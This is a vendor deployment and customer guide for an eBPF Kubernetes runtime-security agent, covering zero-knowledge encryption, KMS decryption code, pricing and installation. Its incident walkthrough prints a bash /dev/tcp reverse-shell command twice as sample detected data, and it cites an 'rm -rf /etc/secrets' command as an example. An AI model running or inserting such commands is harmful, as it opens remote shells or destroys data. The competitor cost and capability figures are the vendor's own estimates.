Tier 3 Deployment & Customer Guide

Overview

Tier 3 (codename EcheDeep) is EchelonGraph's eBPF-based runtime security agent. It runs entirely on your Kubernetes cluster and feeds telemetry to your EchelonGraph SaaS tenant — encrypted with your own keys before it ever leaves your environment.

> Zero-knowledge by design. Your raw traffic, process events, and runtime findings are encrypted on-host with a per-event Data Encryption Key (DEK), wrapped under your customer-managed KMS key (AWS / GCP / Vault), and shipped as ciphertext. EchelonGraph SaaS stores ciphertext + indexed metadata only. Without your KMS, we cannot decrypt.

Shipped capabilities (chart 0.3.0 · agent 1.16.0, all 14 phases live):

  • T3.0 — Helm chart + ZK pipeline + agent enrollment
  • T3.1 — eBPF multi-hook (XDP + TC + tracepoints) with safety scanner
  • T3.2 — PII auto-stripping (11 default rules) + envelope encryption
  • T3.3 — Shadow API discovery (HTTP/2, gRPC, GraphQL, WebSocket, TLS-SNI)
  • T3.4 — Process monitoring (5 detection rule families with MITRE mapping)
  • T3.5 — ML anomaly detection (24h baseline + EWMA + 4 rules)
  • T3.6 — Threat intelligence (abuse.ch URLhaus + Feodo Tracker, CISA KEV, custom STIX 2.1 / TAXII 2.1)
  • T3.7 — Auto-remediation (9 K8s + Terraform patch templates, GitHub PR mode, Slack notifications)
  • T3.8 — Hardware KMS (AWS / GCP / Vault) with async DEK rotation
  • T3.9 — Custom compliance framework builder (DORA / NIS2 / CMMC / FedRAMP templates)
  • T3.10 — Enterprise packaging (Helm OCI, Grafana dashboard, 11 PrometheusRule alerts, air-gap bundle)
  • T3.11 — Browser SDK (Vault Transit) — TypeScript SDK using Web Crypto API for in-browser ZK decryption; backend GET /api/v1/zk/config; migration 045 tenant_zk_config table; admin PUT/DELETE for provider config
  • T3.12 — Browser SDK AWS KMS — hand-rolled SigV4 signer (Web Crypto HMAC-SHA256), ~7 KB gzipped; auth via Cognito Identity Pool / AssumeRoleWithWebIdentity / IAM Roles Anywhere
  • T3.13 — Browser SDK GCP Cloud KMS — REST + bearer-token, ~3 KB gzipped; auth via Google Identity Services / Workload Identity Federation

Zero-Knowledge Architecture — what we see vs. what we don't

The single most-asked question from prospective customers is: *"What can EchelonGraph staff actually read about my workloads?"* Honest answer:

What we see (indexed metadata)

  • Tenant ID + agent ID + pod ID + namespace name
  • Rule ID of every emitted finding (e.g. T3.4-PROC-REVERSE-SHELL, T3.6-IOC)
  • Severity + MITRE ATT&CK technique tag
  • Timestamp + event count
  • Wrapped DEK (your KMS-encrypted key — useless to us without your KMS)
  • Ciphertext payload of the actual event detail

What we cannot decrypt without your KMS

  • Process command lines (/bin/bash -c "rm -rf /etc/secrets") — encrypted
  • Destination IP addresses of network connections — encrypted
  • HTTP request paths + headers — encrypted (PII headers stripped before encryption)
  • File paths accessed by sensitive processes — encrypted
  • Shell environment variables — encrypted
  • TLS SNI hostnames + DNS query targets — encrypted

But how do alerts work if you can't read our data?

This is the most-asked question, and the answer is straightforward: detection happens on your servers, before encryption. The EchelonGraph agent on your host runs the ML anomaly engine, process monitoring rules, threat-intel matching, shadow API discovery, and all detection logic — locally, while the data is still in plaintext. By the time anything reaches our cloud, the *decision* ("is this suspicious?") has already been made.

Each finding has two parts:

PartEncrypted?What we use it for
MetadataNo (plaintext)Routing alerts to Slack/PagerDuty/email/webhooks, populating dashboards, computing compliance scores, threshold-based alerting, MITRE ATT&CK heatmaps
PayloadYes — locked with your KMSOnly forensic investigation — your analyst unlocks it in their browser when they click "view details"

What's in the metadata (we read this freely, this is what powers your alerts):

  • Rule ID (e.g. T3.4-PROC-REVERSE-SHELL, T3.6-IOC-MATCH, T3.5-ANOMALY-TRAFFIC-SPIKE)
  • Severity (critical / high / medium / low)
  • MITRE ATT&CK technique tag (e.g. T1059.004 shell + scripting)
  • Timestamp + event count
  • Tenant ID, agent ID, pod name, namespace
  • Confidence score (0–1)

What's in the encrypted payload (we cannot read this):

  • Process command lines (e.g. /bin/bash -c "rm -rf /etc/secrets")
  • File paths accessed by sensitive processes
  • Destination IP addresses + DNS query targets
  • HTTP request bodies + headers (with PII auto-stripped before encrypt)
  • TLS SNI hostnames
  • Shell environment variables

So when your alert fires saying **"5 reverse-shell attempts in production namespace in the last 10 minutes"**, the count + rule + namespace are all plaintext metadata. We can route the alert. When the on-call analyst clicks the alert and wants to see *which* processes triggered it — that's when their browser unlocks the encrypted payload via your KMS.

> Why this split is the right call. Detection logic is > heavy compute and needs the raw data — running it close to the data > (on your host) is faster and more accurate. Alert routing is > orchestration; it just needs to know "something fired" plus a few > metadata fields. Investigation is rare (1–2% of findings); it's > reasonable for those to require an extra step (browser unlock). > The trade-off: we lose the ability to retroactively re-run detection > on old data — that has to happen on your host with a fresh agent > version.

How your data stays private — end-to-end

In a single picture: data is locked the moment it's collected on your servers, only the locked version is sent to us, and the only place it ever gets unlocked is inside your analyst's browser — using a key that comes directly from your encryption service, not from us.

The simple version: Your data gets locked the moment it's collected on your servers. We only ever see the locked version. The only place it gets unlocked is inside your analyst's browser — and the unlock key comes directly from your encryption service, not from us. If we vanished tomorrow, what we have is permanently unreadable.

Your encryption service

YOU CONTROLAWS · GCP · Vault

In your cloud account, never EchelonGraph's. Both step 1 (your agent) and step 3 (your analyst's browser) call this service directly to lock and unlock data. We never call it. We never have a copy of the key.

  • Your master key NEVER leaves your account
  • All locking & unlocking happens in your KMS hardware
  • Every unlock is written to your KMS audit log

Your servers

YOU CONTROL

EchelonGraph agent runs here

  • Watches what's happening on your computers
  • Locks each piece of data the moment it's collected
  • Calls YOUR encryption service to lock the key — never us
Encrypted data sent over secure channel
(no plaintext ever leaves your servers)

EchelonGraph cloud

ECHELONGRAPH SAAS

We only ever see locked data

  • Stores locked data plus the alert metadata (when, what type)
  • Cannot unlock — we don't have your key
  • Even a database breach keeps your data unreadable
Encrypted data sent to dashboard
(still locked at this point)

Your analyst's browser

YOU CONTROL

The only place data gets unlocked

  • Browser unlocks the data key by calling YOUR KMS directly
  • The unlock request never passes through EchelonGraph
  • Key wiped from browser memory the moment they navigate away
🔒Locked = encrypted, unreadable without your key
🔓Unlocked = readable, only inside your browser
📦Locked data travelling over a secure channel
🔐Your encryption service — never EchelonGraph's

Why we can't read your data, even if we wanted to

This isn't a marketing claim — it's how the system is built. Every statement below is something you can independently verify, either with your cloud provider, with your browser's developer tools, or by reading our open-source code.

How to know we're telling the truth: Every claim below is something you can independently check — with your cloud provider, with browser developer tools, or by reading our open-source code. None of these require taking our word for anything.

Your master key never leaves your account

EchelonGraph never has a copy of your encryption key. It stays inside your AWS, GCP, or Vault account — locked in tamper-resistant hardware, like a physical safe.

How to verifyAsk your cloud provider: "Can my master key ever be exported?" Answer: no — by design.

Backed by

  • We only call your encryption service to lock and unlock data — we never receive the key itself
  • Your provider's hardware physically prevents the key from being copied out
  • Even our own staff would have nothing to leak in a worst-case breach

Decryption happens in your browser, not on our servers

When your analyst clicks "view details", their browser unlocks the data directly. The unlock request goes from their computer straight to your encryption service — it never passes through us.

How to verifyOpen your browser's developer tools (F12) → Network tab → click a finding. You'll see the unlock request going to your cloud provider, NOT to echelongraph.io.

Backed by

  • Your browser → your AWS / GCP / Vault, direct, no proxy
  • EchelonGraph is offline during decryption — we don't see the unlocked data
  • Your corporate firewall logs will confirm this independently

Even if EchelonGraph vanished, your data stays safe

We only ever store the locked version. If our company shut down tomorrow, what we hold remains permanently unreadable to anyone — including any future buyer, our former employees, or anyone who breaches our database.

How to verifyTest it: block app.echelongraph.io in your firewall for a day. Your scrambled data sits in our DB, can't be read by anyone, ever.

Backed by

  • We can't be subpoenaed into producing plaintext we don't have
  • Court orders against us don't bypass your encryption — they hit a wall
  • Built-in compliance with GDPR Art. 25 (data minimisation), DPDP, EU DORA, US CMMC 2.0

Every unlock is recorded in your audit trail

Your cloud provider logs every single time anyone unlocks a piece of your data — including which person unlocked it. The logs always show your team members' names, never EchelonGraph's, because we never make the call.

How to verifyCheck AWS CloudTrail / GCP Cloud Audit Logs / Vault audit log. Filter for "Decrypt" calls — every one will show your analyst's email address.

Backed by

  • Logs are written by your provider, not by us — we can't tamper with them
  • If our staff ever decrypted your data, the log would prove it (and we'd be in violation)
  • Many auditors accept this log as standalone proof of zero-knowledge

The decryption code is open-source — verify it yourself

The exact code that runs in your browser to unlock data is published under Apache 2.0. Any developer on your team can read every line. We've also published 111 automated tests showing what it does.

How to verifyRead the source at frontend/src/lib/zkdecrypt/ in our public repo. If your security team prefers, copy it into your own dashboard — it'll work the same.

Backed by

  • Tests prove the wire format, the auth flow, and that keys are wiped from memory
  • Pull request history shows every change to the security-critical code
  • Your team can audit, fork, or replace it without permission from us

How your dashboard actually calls your KMS to unlock data

The diagram above shows the flow at the architecture level. Here's the same flow at the code level — what your developer wires into your dashboard. The pattern is the same shape for every provider: your dashboard's auth layer fetches a token or credentials from the customer's IdP, then hands them to the SDK's React hook. The SDK calls the customer's KMS directly when an analyst clicks "view locked details" — never through EchelonGraph.

What this looks like in code: Each provider works the same way from the dashboard's perspective: (1) your dashboard's auth layer fetches a token or credentials from the customer's IdP, then (2) hands them to the SDK's React hook. The SDK then calls the customer's KMS directly when an analyst clicks view locked details. Pick the tab for your environment.

How HashiCorp Vault works: Customer signs into Vault via OIDC; dashboard captures the X-Vault-Token and passes it to the SDK.

Step 1 · in your dashboard's auth layer

1. Get a Vault token by signing the user into Vault via your IdP (Okta / Azure AD / Auth0 / Google Workspace) using Vault's OIDC auth method.

// In your dashboard's auth layer
async function getVaultToken(): Promise<string> {
  // Your IdP returns an OIDC code for the signed-in user.
  // Vault exchanges it for a Vault token.
  const oidcCode = await window.myIdP.getOidcCode();

  const res = await fetch(
    "https://vault.your-company.com/v1/auth/oidc/login",
    { method: "POST", body: JSON.stringify({ code: oidcCode }) }
  );
  const json = await res.json();

  return json.auth.client_token; // valid for ~1 hour by default
}
Step 2 · hand the credentials to the SDK

2. Use the token in a dashboard component. The SDK sends it as X-Vault-Token directly to YOUR Vault — no proxy through EchelonGraph.

import { useZkConfig, useZkDecrypt } from "@echelongraph/zkdecrypt";

function FindingDetail({ finding, jwt }) {
  const [vaultToken, setVaultToken] = useState<string | null>(null);
  useEffect(() => { getVaultToken().then(setVaultToken); }, []);

  const { config } = useZkConfig(jwt);             // GET /api/v1/zk/config
  const { decrypt } = useZkDecrypt(config, {
    vaultToken: vaultToken ?? "",                  // your token, not ours
  });

  return (
    <button onClick={async () => {
      const { plaintext } = await decrypt({
        envelope:  finding.encryptedPayload,       // from EchelonGraph API
        tenantId:  finding.tenantId,
        agentId:   finding.agentId,
      });
      // Decryption happened in this browser; plaintext is a Uint8Array
      console.log(new TextDecoder().decode(plaintext));
    }}>
      View locked details
    </button>
  );
}
Things to know
  • Vault token is short-lived — the SDK surfaces 401/403 as kms_auth_failed; re-prompt for OIDC login when you see that
  • Your customer's IAM grants Vault Transit decrypt permission on the configured key — check your Vault audit log to see every unlock

For the complete API reference (envelope wire format, error codes, retry policy, browser/Node compatibility, dispose lifecycle, & admin write endpoint to configure your KMS), see /docs/tier3-zk-decryption. The SDK source is open under Apache 2.0 at frontend/src/lib/zkdecrypt/.

A complete incident — end-to-end with realistic data

Everything above is architecture and code. Here's what an actual production incident looks like, step by step, with real-shaped sample data at every layer of the pipeline. Follow the timeline from kernel-level eBPF detection through to GitHub-PR-driven auto- remediation. Watch the green boxes (data we can read freely) and the red boxes (data we cannot read at all) — that contrast is the entire zero-knowledge promise made concrete.

Real incident — end-to-end walkthrough. A reverse-shell attempt is launched from a compromised pod in Acme Corp's production cluster. Below: every system event from kernel-level detection through to auto-remediation, with the actual data each party sees at every step. Pay attention to which boxes are green (we read freely) versus red (we cannot read at all).
  1. T+0.000sYour host (worker-3.acme-prod)·eBPF kernel hook

    Reverse-shell process spawns inside a production pod

    At 14:32:07.123 UTC, the gunicorn worker in the checkout-api deployment forks a new bash process. The eBPF tracepoint hook on the customer's host captures the execve system call and forwards it to the EchelonGraph agent for evaluation.
    Raw kernel event (only on customer's host)✓ Plaintext
    PID:    3847
    PPID:   3128 (gunicorn)
    Comm:   bash
    Args:   /bin/bash -c "bash -i >& /dev/tcp/198.51.100.74/4444 0>&1"
    Cwd:    /tmp
    UID:    33 (www-data)
    Pod:    checkout-api-pod-7b9c
    NS:     production
    Node:   worker-3.acme-prod
    This data NEVER leaves the host in plaintext.
  2. T+0.012sEchelonGraph agent (Tentacle DaemonSet)·Detection engines run locally

    Two detection rules fire on the customer's host

    The agent evaluates the event against every Tier 3 detection engine, all running locally on the customer's host with full plaintext access. Two rules match: the process-monitor flags the bash command line as a reverse shell (T3.4), and the threat-intel matcher recognises the destination IP from the abuse.ch / CISA KEV feeds (T3.6).
    Local detection result (still on host, plaintext)✓ Plaintext
    rules_matched: [T3.4-PROC-REVERSE-SHELL, T3.6-IOC-MATCH]
    mitre_technique: T1059.004  (Unix Shell)
    severity: critical
    confidence: 0.97
    ioc_source: abuse.ch URLhaus + CISA KEV
    finding_id: f-9d4e2a17
    event_count: 1
    Detection logic runs in-process on the host. By this point the verdict is already final — EchelonGraph cloud never participates in detection.
  3. T+0.018sEchelonGraph agent·Encrypt + ship

    Agent locks the sensitive payload before shipping

    The agent generates a fresh 32-byte data key (DEK), AES-256-GCM encrypts the sensitive details (command line, file paths, destination IP, etc.), and asks the customer's KMS to wrap the DEK. The wrapped DEK plus ciphertext are bundled with the plaintext metadata and shipped over TLS 1.3 gRPC.
    Plaintext metadata sent to EchelonGraph✓ Plaintext
    {
      "tenant_id":       "acme-corp",
      "agent_id":        "tentacle-worker-3",
      "rule_id":         "T3.4-PROC-REVERSE-SHELL",
      "severity":        "critical",
      "mitre_technique": "T1059.004",
      "ts":              "2026-05-07T14:32:07.123Z",
      "pod":             "checkout-api-pod-7b9c",
      "namespace":       "production",
      "confidence":      0.97,
      "ioc_match":       "T3.6-IOC-MATCH",
      "event_count":     1
    }
    EchelonGraph reads this freely — it's how alerts get routed.
    Encrypted payload (locked with the customer's KMS)🔒 We CANNOT read
    nonce      (12 bytes hex):  a3f2e1c509bb47c1d4e832af
    ciphertext (245 bytes b64): kJh3T9xQ4Z2wL1vPdR8mN0yQp7Vk
                                sB8xJq2fT5rY3wHmN9pK4tA0iL6e
                                ... (truncated, 245 bytes total)
    AEAD tag   (16 bytes hex):  e1f8d3c4b29a5e6708d2f4a1
    wrapped-DEK (KMS blob):     AQECAHj8H5jK4Z9wL...
    Without the customer's KMS key, this is just random bytes — even our own DBA can't reconstruct the command line.
  4. T+0.450sEchelonGraph cloud·Ingester → CloudSQL + ClickHouse

    EchelonGraph stores the row — ciphertext stays opaque to us

    The Ingester validates the wire format, writes the metadata columns to Postgres for the alert layer to query, and pushes the ciphertext + wrapped-DEK to ClickHouse with a 90-day retention TTL. We index every metadata field for routing, compliance reporting, and dashboard queries.
    Stored row (what an EchelonGraph engineer can SELECT)✓ Plaintext
    tenant_id          | acme-corp
    rule_id            | T3.4-PROC-REVERSE-SHELL
    severity           | critical
    mitre_technique    | T1059.004
    ts                 | 2026-05-07 14:32:07.123
    pod                | checkout-api-pod-7b9c
    namespace          | production
    confidence         | 0.97
    ioc_match          | T3.6-IOC-MATCH
    encrypted_payload  | \xa3f2e1c509bb...e1f8d3c4   ← unreadable
    wrapped_dek        | \xAQECAHj8H5jK4Z9wL...      ← unreadable
    Our staff can run analytics on metadata. The two unreadable columns are what protects you.
  5. T+0.620sEchelonGraph alert manager·Slack / PagerDuty / webhook routing

    Alert fires — built entirely from plaintext metadata

    A pre-configured rule (“CRITICAL severity in production namespace”) matches. Alert manager builds a Slack message using the metadata fields only and POSTs it to the customer's Slack webhook. The encrypted payload is not touched.
    Slack message that fires in #soc-prod-alerts✓ Plaintext
    🚨 CRITICAL: Reverse shell in production
       Tenant: acme-corp · Pod: checkout-api-pod-7b9c
       Namespace: production · Confidence: 97%
       MITRE: T1059.004 (Unix Shell)
       IOC match: known C2 from abuse.ch URLhaus
       Time: 2026-05-07 14:32:07 UTC
    
       [Investigate ↗]  [Acknowledge]  [Auto-remediate]
    The Slack message has zero plaintext details from the encrypted payload. Routing works fine without us reading anything.
  6. T+27sAlice (SOC analyst)·Opens app.echelongraph.io/findings/f-9d4e2a17

    Analyst opens the dashboard from the Slack alert

    Alice clicks [Investigate ↗] in Slack. Her browser navigates to app.echelongraph.io, the SPA loads, the dashboard fetches the finding. The metadata renders immediately — but the “What process ran?”, “Where did it connect?”, and “Full command-line” sections show a 🔒 Locked — click to unlock placeholder.
  7. T+30sBrowser SDK (frontend/src/lib/zkdecrypt)·Calls Alice's Vault DIRECTLY

    Browser unlocks the data key via Vault — bypasses EchelonGraph

    Alice clicks “view locked details”. Her browser already has a Vault token from this morning's OIDC sign-in (cached in sessionStorage). The SDK POSTs the wrapped DEK to vault.acme.com directly. Vault unwraps it inside its HSM and returns the plaintext DEK. The SDK runs AES-GCM decrypt in the browser using Web Crypto API. Plaintext renders. zeroBytes(DEK) wipes the key from JS heap.
    Browser → Vault POST (visible in DevTools Network tab)🔐 Customer's KMS
    POST https://vault.acme.com/v1/transit/decrypt/echelongraph
    X-Vault-Token: hvs.CAESI...       ← Alice's OIDC-derived token
    Content-Type: application/json
    
    {
      "ciphertext": "vault:v1:AQECAHj8H5jK4Z9wL..."  ← wrapped DEK
    }
    
    ← Response from Vault:
    {
      "data": { "plaintext": "kJh3T9xQ4Z2wL1vPdR8mN0y..." }
    }
    Open Alice's DevTools Network tab and you'll see this exact request going to vault.acme.com — NOT to echelongraph.io.
    Plaintext rendered in Alice's browser (and only there)✓ Plaintext
    Process command line:
      /bin/bash -c "bash -i >& /dev/tcp/198.51.100.74/4444 0>&1"
    
    Working directory: /tmp
    UID: 33 (www-data) — gunicorn's own user, no privilege escalation
    PID: 3847 · Parent: gunicorn (PID 3128)
    Destination: 198.51.100.74:4444
    
    IOC source: abuse.ch URLhaus
    First seen: 2026-04-22 — known C2 for "RedShell" toolkit
    This text exists only in Alice's browser tab memory. When she navigates away, dispose() wipes it.
  8. T+30.5sAcme's Vault audit log·Records the unlock with caller identity

    Vault writes an audit-log entry — proving Alice unlocked it, not us

    Vault's audit log records every Decryptcall with the caller's federated identity. Acme's SOC team (or external auditor) can grep this log to confirm that EchelonGraph staff have never made a decrypt call against their key.
    Acme's Vault audit log (their copy, written by their Vault)📜 Customer's log
    2026-05-07 14:32:37 UTC — vault.transit.decrypt
      caller_id:   alice@acme-corp.com
      auth_method: oidc/okta
      key_name:    echelongraph
      success:     true
      request_id:  7c45-ab12-9e30-4f15
      remote_addr: 203.0.113.45 (Alice's office IP)
    The caller_id is Alice's IdP identity — never an EchelonGraph staff identity, because we never make the call.
  9. T+45sAuto-remediation engine (T3.7)·Generates IaC patch + opens GitHub PR

    Alice triggers auto-remediation — a NetworkPolicy PR opens

    Alice clicks Auto-remediate. The remediation engine selects the K8s NetworkPolicy template (matching the finding's category), substitutes the offending pod labels, and opens a GitHub PR in acme-corp/infra-iac. Alice (admin role) clicks Merge → ArgoCD applies the policy → the compromised pod loses egress in < 60 seconds.
    Auto-generated NetworkPolicy (committed to acme-corp/infra-iac)✓ Plaintext
    apiVersion: networking.k8s.io/v1
    kind: NetworkPolicy
    metadata:
      name: deny-egress-checkout-api-incident-f9d4e2a17
      namespace: production
      annotations:
        echelongraph.io/finding: f-9d4e2a17
        echelongraph.io/rule:    T3.4-PROC-REVERSE-SHELL
    spec:
      podSelector:
        matchLabels:
          app: checkout-api
      policyTypes: [Egress]
      egress: []   # deny all outbound traffic
    PR opened by github-app/echelongraph-bot · approved by alice@acme-corp.com · merged at 14:33:41 · ArgoCD synced at 14:34:09.
End-to-end recap — total elapsed: 45 seconds

Detection ran on Acme's host (T+0 to T+18 ms). Encryption + ship took ~430 ms over TLS 1.3 gRPC. Alert routed to Slack 620 ms after the kernel event. Alice opened the dashboard, unlocked the encrypted payload via her own Vault, triggered remediation, and had the compromised pod isolated within a minute. Throughout the entire incident, EchelonGraph never read the bash command line, the destination IP, or any other detail of the actual exploit— only the metadata needed to route the alert. Acme's Vault audit log proves it: every Decrypt call shows alice@acme-corp.com as the caller, never an EchelonGraph identity.

Two decryption paths

Browser SDK (T3.11+) — the dashboard at app.echelongraph.io renders decrypted detail in the operator's browser using the open-source @echelongraph/zkdecrypt TypeScript SDK. Customer signs into their KMS via OIDC; the SDK calls the customer's Vault / AWS / GCP KMS directly from the browser to unwrap each event's DEK. EchelonGraph backend never sees the plaintext.

* Vault Transit — shipped in T3.11. * AWS KMS via SigV4 + Cognito / STS federation — shipped in T3.12. * GCP Cloud KMS via Google Identity Services / Workload Identity Federation — shipped in T3.13.

Go SDK (sdk/zkdecrypt) — for SOC pipelines, SIEM forwarders, and analytics notebooks. Customer fetches the KEK from their KMS via the provider CLI (aws kms decrypt, gcloud kms decrypt, vault read), passes it to the SDK along with the encrypted envelope, gets back plaintext. Run anywhere Go runs — Lambda, Cloud Run, on-prem worker.

Both paths share the same envelope wire format. See /docs/tier3-zk-decryption for the full SDK reference.

Verifying the property

# Inspect the ciphertext directly in your CloudSQL — should be unreadable.
gcloud sql connect ... --database=echelongraph
> SELECT id, encrypted_payload FROM zk_telemetry LIMIT 1;

The encrypted_payload column is AES-256-GCM ciphertext. Even with full read access to our DB, an attacker (or an EchelonGraph employee) cannot reconstruct the underlying event.


Customer responsibilities

When you onboard Tier 3, here's what's on your side vs. ours:

ResponsibilityYouEchelonGraph
Provision Helm chart on your cluster
Provide a customer-managed KMS key
Set IAM policy / Vault token for the agent
Configure NetworkPolicy egress to ingest endpoint
Maintain agent upgrades (chart minor bumps)✓ (we publish; you helm upgrade)
Operate the SaaS dashboard / API
Maintain ingest pipeline, storage, indexing
Run feed updates (URLhaus, CISA KEV)✓ (agent pulls; you can air-gap)
Define custom compliance frameworks
Approve auto-remediation patches✓ (admin RBAC)

One-time onboarding (~15 min)

  1. Create a KMS key. AWS: arn:aws:kms:...; GCP: projects/.../cryptoKeys/...; Vault: transit/keys/echelongraph.
  2. Grant the agent's principal Encrypt + Decrypt on that key only.
  3. Generate a one-time enrollment OTP in your dashboard (Settings → Agents → New).
  4. helm install the chart with the OTP + KMS config. The agent auto-enrolls.
  5. Verify via kubectl port-forward + /readyz (returns 200 once eBPF hooks attach).

After step 5, your dashboard's "Connected Agents" indicator goes green and findings start flowing.


Pricing model

EchelonGraph Tier 3 prices on node count, not on event volume — your cost is predictable regardless of traffic spikes.

PlanPriceNodesIncludes
Team$49/node/monthup to 50All T3.0–T3.10 features, AWS/GCP/Vault KMS, 30-day retention
Pro$149/node/monthup to 250Team + 1-year retention + auto-remediation PR mode + custom compliance
EnterpriseContact salesunlimitedPro + air-gapped install + dedicated SaaS region + custom SLA

Volume discounts apply at 100+ / 500+ / 1000+ nodes.

Cost comparison vs. competitors

For a typical mid-size deployment (100 nodes, 50K events/sec average):

VendorAnnual cost (est.)Notes
EchelonGraph Tier 3 (Pro)$178,800$149 × 100 × 12 — flat node price
Sysdig Secure~$240,000Per-node + per-image scanning + per-host runtime; tiered pricing
Aqua CSPM + Runtime~$280,000Per-workload + per-cluster + add-on for agentless runtime
Falco Cloud (Sysdig)~$192,000Per-node, no auto-remediation, no compliance builder, no KMS BYOK
Wiz Runtime Sensor~$320,000+Bundled w/ CNAPP suite — minimum bundle pricing

Why Tier 3 costs less:

  1. No per-image scanning charge — Tier 3 doesn't replicate the Tier 1/2 cloud + image scanning surface; that's already covered by EchelonGraph's other tiers.
  2. No per-event metering — your traffic spike doesn't change your bill.
  3. Self-hosted agent — we don't run inference servers on your data; you pay for SaaS dashboard + indexing only.
  4. BYOK is included — Sysdig charges $50K+ for "private cloud" SKUs that include customer-managed encryption.

Why we cost what we do

  • R&D: every detection rule has a documented MITRE ATT&CK mapping, a reference to a public threat report, and an integration test. Detection quality is our moat.
  • Custom compliance builder: DORA / NIS2 / CMMC / FedRAMP templates ready out-of-box. Most competitors charge add-ons.
  • Hardware KMS: AWS + GCP + Vault native — not "bring a CSV of indicators" or "managed inside our cloud."
  • Auto-remediation: 9 IaC patch templates with audit trail + admin approval workflow. Sysdig/Aqua charge for "remediation packages" as add-ons.
  • Air-gapped support: scripts/airgap-bundle.sh ships a complete tarball; no phone-home required.

Security comparison

CapabilityTier 3SysdigAquaFalcoWiz
Zero-knowledge data plane (BYOK encryption)
Kernel-level eBPF telemetry✓ (sensor)
Process monitoring + reverse-shell detection
Network anomaly detection (ML-statistical)
Custom compliance framework builderpartialpartial
Auto-remediation IaC PR generation
Air-gapped mode (no phone-home)partial
AWS / GCP / Vault KMS integrationpartial
Per-tenant suppression rules
Threat-intel: STIX 2.1 + TAXII 2.1 nativepartialpartial
MITRE ATT&CK auto-taggingpartial
EU GDPR / DPDP Article-25 by designpartialpartialpartial
Open-source customer SDK (zkdecrypt)✓ (rule lang)

Three things only EchelonGraph Tier 3 does

  1. Zero-knowledge data plane. Your encrypted payload arrives at our infrastructure — and we cannot decrypt it. Sysdig/Aqua/Wiz all have access to your raw event data; Falco runs entirely on-prem (no SaaS analytics).
  2. End-to-end auto-remediation with admin approval. Detect → generate IaC patch (Terraform / K8s / Helm) → open PR → admin approves → apply. Sysdig + Aqua have advisory remediation; only ours closes the loop while keeping a full audit trail.
  3. Customer-defined compliance frameworks. DORA / NIS2 / CMMC / FedRAMP templates plus the option to build your own (versioned, immutable-once-published, JSON portable). Sysdig/Aqua ship fixed framework catalogs.

Installation

1. Pull the chart

helm pull oci://us-central1-docker.pkg.dev/echelongraph-prod/echelon-customer/echelongraph-tier3 --version 0.3.0

2. Configure KMS

Pick one provider — see the per-provider setup guide:

3. Enroll + install

export ECHELON_AGENT_ENROLL_TOKEN="<otp from dashboard>"

helm upgrade --install echelongraph-tier3 \
  oci://us-central1-docker.pkg.dev/echelongraph-prod/echelon-customer/echelongraph-tier3 --version 0.3.0 \
  -n echelongraph-system --create-namespace \
  --set tenant.id="<your-tenant-id>" \
  --set secrets.encryptionKey="$(openssl rand -hex 32)" \
  --set secrets.enrollmentToken=$ECHELON_AGENT_ENROLL_TOKEN \
  --set secrets.enrollmentEndpoint="https://app.echelongraph.io" \
  --set ingester.address="ingest.echelongraph.io:443"
# For an external KMS provider (AWS/GCP/Vault) instead of the in-cluster BYOK
# key, configure it per the KMS setup links in step 2.

4. Verify

kubectl get pods -n echelongraph-system
# tier3-master-xxx       1/1 Running
# tier3-tentacle-xxx     1/1 Running per node

# Health (port-forward — agent images are distroless, no shell)
kubectl port-forward -n echelongraph-system deploy/tier3-master 8087:8087 &
curl -sS http://localhost:8087/readyz
# 200 OK once eBPF hooks attach + ingester reachable

In your EchelonGraph dashboard, the agent should show "Connected" within 30 seconds.


Air-gapped customers

For environments with no outbound internet (regulated finance, government, defense):

# 1. On a connected machine, build the bundle.
./scripts/airgap-bundle.sh --version=1.10.1 --include-ioc

# 2. Transfer the .tar.zst to your air-gapped network.
# 3. Load images into your private registry.
# 4. helm install with TIER3_AIRGAPPED=true and image overrides.

The bundle includes:

  • Master + Tentacle Docker images
  • Helm chart (.tgz)
  • Grafana dashboard JSON
  • Prometheus alert rules
  • (Optional) IOC database snapshot at bundle time

What customers do NOT need to do

  • No CVE database maintenance. Tier 3 pulls abuse.ch URLhaus + Feodo Tracker + CISA KEV automatically (every 6h). Air-gapped customers ship snapshots in the bundle.
  • No anomaly model training. The statistical baseline (24h rolling window + EWMA + seasonality) is fully unsupervised; warm-up takes 24h after install.
  • No rule authoring for the basics. 30+ detection rules ship out-of-box (T3.4 process + T3.5 anomaly + T3.6 IOC). Custom rules are optional.
  • No on-call. Alerts route to your existing PagerDuty / Slack / email via the standard PrometheusRule we ship.

Operational reference

DocTopic
TIER3_DEPLOYMENT.mdCustomer install + config + troubleshooting catalog
TIER3_KMS_SETUP.mdAWS / GCP / Vault setup with IAM permissions per provider
TIER3_BACKUP_RESTORE.mdPostgres + ClickHouse export/import + RTO/RPO matrix
UPGRADING.mdVersion compatibility matrix + per-version migration list
CHANGELOG.mdFull release history

Confidence checklist for security review

If your security team is evaluating Tier 3, here's the audit trail they typically request:

  • [ ] eBPF verifier compliance — every program is loaded via cilium/ebpf with the kernel verifier; programs that fail validation are rejected at load time.
  • [ ] Unprivileged by default — tentacle runs with a least-privilege capability set (CAP_SYS_ADMIN, CAP_BPF, CAP_NET_ADMIN), not a fully-privileged container; full privilege is an opt-in escape hatch for restrictive kernels only. No host filesystem write. No host network.
  • [ ] Customer-managed encryption keysTIER3_KMS_PROVIDER chooses your KMS; envelope encryption uses per-event DEK wrapped by your KEK. We document that we never see plaintext.
  • [ ] Open-source SDKsdk/zkdecrypt is the canonical decryption path; auditable Go.
  • [ ] No outbound from the agent beyond ingest.echelongraph.io:443. Air-gapped mode disables even that.
  • [ ] License feature flags — every paid feature is gated behind a license claim signed by EchelonGraph; rotation supported.
  • [ ] Open-source threat-intel feeds — abuse.ch + CISA KEV are public; the agent never sends *your* findings to those upstream services.
  • [ ] Audit log for every admin-grade action (remediation approve, framework publish, agent enrollment).

Uninstall

helm uninstall echelongraph-tier3 -n echelongraph-system
kubectl delete namespace echelongraph-system

The agent self-zeroes its DEK on shutdown. Wrapped DEKs in our backend remain (we can't decrypt anyway); for full removal, contact support@echelongraph.io with a tenant deletion request and we'll TRUNCATE the ciphertext rows.